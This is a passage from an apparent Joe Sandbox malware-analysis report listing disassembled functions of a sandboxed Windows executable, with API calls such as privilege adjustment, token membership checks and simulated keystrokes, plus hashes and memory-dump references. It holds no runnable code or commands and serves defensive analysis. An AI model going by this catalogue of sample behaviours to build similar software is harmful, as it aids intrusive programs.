                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: 5e95f689703b5201e28b96decfa185f94b68a36a3c9723d02de07bab0bf92edc
                                                                      • Instruction ID: ee8ec7c4e8fe9a533462a42ac4c92bc129091adfdd0d252140c5e874c7ef6b9a
                                                                      • Opcode Fuzzy Hash: 5e95f689703b5201e28b96decfa185f94b68a36a3c9723d02de07bab0bf92edc
                                                                      • Instruction Fuzzy Hash: 26312B75A005189FDB00DF94D8C8FADBBB4FF49314F088099E805AB3A2DB31E955CB91
                                                                      Function 00C816C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C3FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C40668
                                                                        • Part of subcall function 00C3FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C40685
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C8170D
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C8173A
                                                                      • GetLastError.KERNEL32 ref: 00C8174A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                      • String ID:
                                                                      • API String ID: 577356006-0
                                                                      • Opcode ID: 43cc8ec23b25881a399eef7e07862ae3115f3d38642875a5f2b229edd13ae6fb
                                                                      • Instruction ID: 5a5590c9bb744ea93af5dabc4f21ce1736fd7c45d3b2a1143578d187d9f51fd3
                                                                      • Opcode Fuzzy Hash: 43cc8ec23b25881a399eef7e07862ae3115f3d38642875a5f2b229edd13ae6fb
                                                                      • Instruction Fuzzy Hash: 0C118CB2814204AFD718AF54ECCAE6BB7FDEB44714B24852EF46657241EB70BC428B24
                                                                      Function 00C8D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C8D608
                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C8D645
                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C8D650
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                      • String ID:
                                                                      • API String ID: 33631002-0
                                                                      • Opcode ID: 50fbb46830de56c1610e44bfc3927d1cc662a50055d7cf42f8b12bf9eb4f29a1
                                                                      • Instruction ID: 5a46af2c27cf20829518f116d0419c84d2d248ea2503833dfaa7254f87b7bc8f
                                                                      • Opcode Fuzzy Hash: 50fbb46830de56c1610e44bfc3927d1cc662a50055d7cf42f8b12bf9eb4f29a1
                                                                      • Instruction Fuzzy Hash: 4B118E71E05228BFDB108F99EC84FAFBBBCEB45B60F108121F914E7290D2704E018BA1
                                                                      Function 00C81663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C8168C
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C816A1
                                                                      • FreeSid.ADVAPI32(?), ref: 00C816B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: eec323f532a4060f87dcd852e5fec477da19fad1689be02f6aee7abfe41a0d29
                                                                      • Instruction ID: aa5a43da593d179594c08dde017ff1f3b19bff824a81b5205b766e9106359d0b
                                                                      • Opcode Fuzzy Hash: eec323f532a4060f87dcd852e5fec477da19fad1689be02f6aee7abfe41a0d29
                                                                      • Instruction Fuzzy Hash: FCF0F471950309FBDB00EFE4DC89AAEBBBCFB08604F504565E901E2181E774AA448B64
                                                                      Function 00C44CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00C528E9,?,00C44CBE,00C528E9,00CE88B8,0000000C,00C44E15,00C528E9,00000002,00000000,?,00C528E9), ref: 00C44D09
                                                                      • TerminateProcess.KERNEL32(00000000,?,00C44CBE,00C528E9,00CE88B8,0000000C,00C44E15,00C528E9,00000002,00000000,?,00C528E9), ref: 00C44D10
                                                                      • ExitProcess.KERNEL32 ref: 00C44D22
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: f52595dada68502b1ec2449d3bb6bbb087d2fbeea38bb4f60d5b26629416dbd9
                                                                      • Instruction ID: 4668bae2dd484a16145d27a87caf61ac8151bc4171efa051005fddc7ff000577
                                                                      • Opcode Fuzzy Hash: f52595dada68502b1ec2449d3bb6bbb087d2fbeea38bb4f60d5b26629416dbd9
                                                                      • Instruction Fuzzy Hash: 69E0B631400148ABCF15AF54DD49B9C3BA9FB41791F604118FC159A132CB35DE42DA80
                                                                      Function 00C5C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /
                                                                      • API String ID: 0-2043925204
                                                                      • Opcode ID: 0842db65abb38e3860b7f61f2de81e9f87151a30d9d32aadfa7a6aa9602b3665
                                                                      • Instruction ID: 9c521541d929881c77e7a6e074de0e792c5b8781cce2bd04f616d4d642283576
                                                                      • Opcode Fuzzy Hash: 0842db65abb38e3860b7f61f2de81e9f87151a30d9d32aadfa7a6aa9602b3665
                                                                      • Instruction Fuzzy Hash: 1541337A900318AFCB209FB9CC89EBB77B8EB84315F104268FD15C7190E2709EC58B58
                                                                      Function 00C4CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                      • Instruction ID: f6b792da03e315db686ee15b51bc64fb3fa02d06511a77b31e53beb64903b9f1
                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                      • Instruction Fuzzy Hash: B6022B71E012199BDF54CFA9C8C06ADFBF1FF48314F25816AD929E7390D731AA418B94
                                                                      Function 00C968EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C96918
                                                                      • FindClose.KERNEL32(00000000), ref: 00C96961
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: a440f43323a2d5bbfca95b6c242cebc856b47cee536993569612ee9ae34d85a7
                                                                      • Instruction ID: a9be70d1906cb954128dcde9f3adbca9e240b0a6ea878c2b04d8be4d800ebfc4
                                                                      • Opcode Fuzzy Hash: a440f43323a2d5bbfca95b6c242cebc856b47cee536993569612ee9ae34d85a7
                                                                      • Instruction Fuzzy Hash: 5C118E316042109FCB10DF69D4C8A1ABBE5EF89328F15C6A9E4698F6A2C730EC05CB91
                                                                      Function 00C937B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00CA4891,?,?,00000035,?), ref: 00C937E4
                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00CA4891,?,?,00000035,?), ref: 00C937F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: df2615985d334e6d69c642ad5cd2031f4998a83a7cf8b9cf7898bd1afb7ac3f5
                                                                      • Instruction ID: e341a0d554e37b85acd3451c6e94b9900b3714d99a110f6f2af681913593c209
                                                                      • Opcode Fuzzy Hash: df2615985d334e6d69c642ad5cd2031f4998a83a7cf8b9cf7898bd1afb7ac3f5
                                                                      • Instruction Fuzzy Hash: FEF0E5B07042282AEB2057A69C8DFEB3AAEEFC5761F000265F509D22D1DA609904C6B1
                                                                      Function 00C8B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C8B25D
                                                                      • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00C8B270
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: InputSendkeybd_event
                                                                      • String ID:
                                                                      • API String ID: 3536248340-0
                                                                      • Opcode ID: 6e4a06822912a9c91cc580d7b3e75dc1b3633c3ffd97e68c721edc9e5954df45
                                                                      • Instruction ID: 0162936ae407561ee248a2574799c4e26b5026c6243b4c6dc2991f95548897e2
                                                                      • Opcode Fuzzy Hash: 6e4a06822912a9c91cc580d7b3e75dc1b3633c3ffd97e68c721edc9e5954df45
                                                                      • Instruction Fuzzy Hash: 37F06D7080424EABDF059FA0C805BEE7BB0FF04309F008009F961A5192C37986019F98
                                                                      Function 00C810BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C811FC), ref: 00C810D4
                                                                      • CloseHandle.KERNEL32(?,?,00C811FC), ref: 00C810E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: f9e2cf4cfd04b4b0d54baf93d846475798298d601cb686038aef6a06f1c1388c
                                                                      • Instruction ID: da93d3b60964e5af1a377107f5b1027ceb9e9925fb681ad663357c06da5e1139
                                                                      • Opcode Fuzzy Hash: f9e2cf4cfd04b4b0d54baf93d846475798298d601cb686038aef6a06f1c1388c
                                                                      • Instruction Fuzzy Hash: 49E04F32418600AFE7252B11FC09F7777E9EB04320F14892DF4A5804B1DB626C91EB50
                                                                      Function 00C2CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Variable is not of type 'Object'., xrefs: 00C70C40
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable is not of type 'Object'.
                                                                      • API String ID: 0-1840281001
                                                                      • Opcode ID: 928499db342de5e7fe2baacdbe248f700da9cd31ba8a2ee2bc8536225f59107c
                                                                      • Instruction ID: 6688bcce7e8e40a4d7bcd233f880f84b76081c9b523f98d121929670f847213e
                                                                      • Opcode Fuzzy Hash: 928499db342de5e7fe2baacdbe248f700da9cd31ba8a2ee2bc8536225f59107c
                                                                      • Instruction Fuzzy Hash: E932BC70900228DBCF14DF94E9C1BEDB7B5FF09304F208069E81AAB692D775AE45DB61
                                                                      Function 00C5676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C56766,?,?,00000008,?,?,00C5FEFE,00000000), ref: 00C56998
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 3997070919-0
                                                                      • Opcode ID: cb1a20373b4180e0e8520ee43e80bfb63bdf88f0e05788ca8bb2137a216b5671
                                                                      • Instruction ID: ab8a93f9c6b4b27bd9a3397eb9627a2bfed7094b422caa337aefac0e79e13a71
                                                                      • Opcode Fuzzy Hash: cb1a20373b4180e0e8520ee43e80bfb63bdf88f0e05788ca8bb2137a216b5671
                                                                      • Instruction Fuzzy Hash: 59B16C39610608DFD715CF28C486B657BE0FF05366F658658ECA9CF2A2C335DA89CB44
                                                                      Function 00C4781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction ID: e26b7a5c077455ebd52cf364c24e6211c50b405f44687ccb70857df0f4c5fc04
                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction Fuzzy Hash: 35518B71A0C7455BDF388579895D7BF2789BB22300F180B09E8A2EB2C2C715DF09E356
                                                                      Function 00C56DD9 Relevance: .6, Instructions: 637COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af88cc12de7b34de2a8711ff12e426c5647a03f9722f5944dfe352091476fb20
                                                                      • Instruction ID: 5f352ce7b04a20ffc1280cd3052b9f68403f9bfa395a1fc0b2eae6535eba3b2f
                                                                      • Opcode Fuzzy Hash: af88cc12de7b34de2a8711ff12e426c5647a03f9722f5944dfe352091476fb20
                                                                      • Instruction Fuzzy Hash: 5B321326D29F014DD7239634D822339A249AFB73C6F15D737EC2AB59A6EF28C5C34100
                                                                      Function 00C3CC39 Relevance: .6, Instructions: 635COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 929805c733b7b72954014c8614dbd92e2dea039d56b02cac0e034cfc0ad07d1b
                                                                      • Instruction ID: c3598c2985832d650e171b84cd28db2fa53089f8e756518892307528ae60ad3e
                                                                      • Opcode Fuzzy Hash: 929805c733b7b72954014c8614dbd92e2dea039d56b02cac0e034cfc0ad07d1b
                                                                      • Instruction Fuzzy Hash: 51321631A001578BDF28DF29D4D467D7BA1EB45310F28C56EE86EAB291D730DE82EB41
                                                                      Function 00C27920 Relevance: .6, Instructions: 563COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5d56fe7928522128562650676c737f8e1d11d1058a978b0f50b521d78b484219
                                                                      • Instruction ID: 112cb640ac639a3821146153e0296109534a1a64af24e15efc8e73ca792f5c90
                                                                      • Opcode Fuzzy Hash: 5d56fe7928522128562650676c737f8e1d11d1058a978b0f50b521d78b484219
                                                                      • Instruction Fuzzy Hash: FD22D170A0061ADFDF14CF65D8C1AAEB3F1FF44300F204629E816A7691EB36AE55DB50
                                                                      Function 00C291C0 Relevance: .5, Instructions: 475COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
